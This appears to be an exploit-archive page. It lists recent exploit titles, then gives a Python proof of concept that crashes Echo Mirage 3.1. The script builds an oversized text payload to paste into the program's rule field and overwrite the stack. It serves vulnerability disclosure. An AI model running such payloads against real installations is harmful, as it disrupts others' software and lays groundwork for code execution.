
11 changes to exploits/shellcodes Linux Kernel 4.13 - 'compat_get_timex()' Leak Kernel Pointer Echo Mirage 3.1 - Buffer Overflow (PoC) GattLib 0.2 - Stack Buffer Overflow Kepler Wallpaper Script 1.1 - SQL Injection Coman 1.0 - 'id' SQL Injection Reservic 1.0 - 'id' SQL Injection MoneyFlux 1.0 - 'id' SQL Injection PHP Dashboards NEW 5.8 - 'dashID' SQL Injection PHP Dashboards NEW 5.8 - Local File Inclusion PHP Uber-style GeoTracking 1.1 - SQL Injection Adianti Framework 5.5.0 - SQL Injection
33 lines
No EOL
813 B
Python
Executable file
33 lines
No EOL
813 B
Python
Executable file
#!/usr/bin/python
|
|
|
|
# Exploit Title: Echo Mirage 3.1 Buffer Overflow PoC (Stack Overflow)
|
|
# Date: 21-01-2019
|
|
# Software Link: https://sourceforge.net/projects/echomirage.oldbutgold.p/
|
|
# Version: 3.1 (x64)
|
|
# Exploit Author: InitD Community
|
|
# Contact: https://twitter.com/initd_sh
|
|
# Website: http://initd.sh/
|
|
# Tested on: Windows 7
|
|
|
|
|
|
"""
|
|
Step to Reproduce : Open Echo Mirage --> 1) Click on "Rules" --> 2) click on "New" --> 3)Copy "Echo-Mirage-BoF-POC.txt" content and Paste in "action" field. --> BOoo0m.
|
|
|
|
Thanks: Touhid M.Shaikh(@touhidshaikh22), Shrutirupa(@creak_crypt)
|
|
This Bug Identified by Touhid M.Shaikh
|
|
"""
|
|
|
|
buffer = "A"*24241
|
|
|
|
RBP = "B"*8
|
|
|
|
PAD = "C"*50
|
|
|
|
evil = buffer + RBP + PAD
|
|
|
|
|
|
evil_file = open("Echo-Mirage-BoF-POC.txt","w")
|
|
|
|
evil_file.write(evil)
|
|
|
|
evil_file.close() |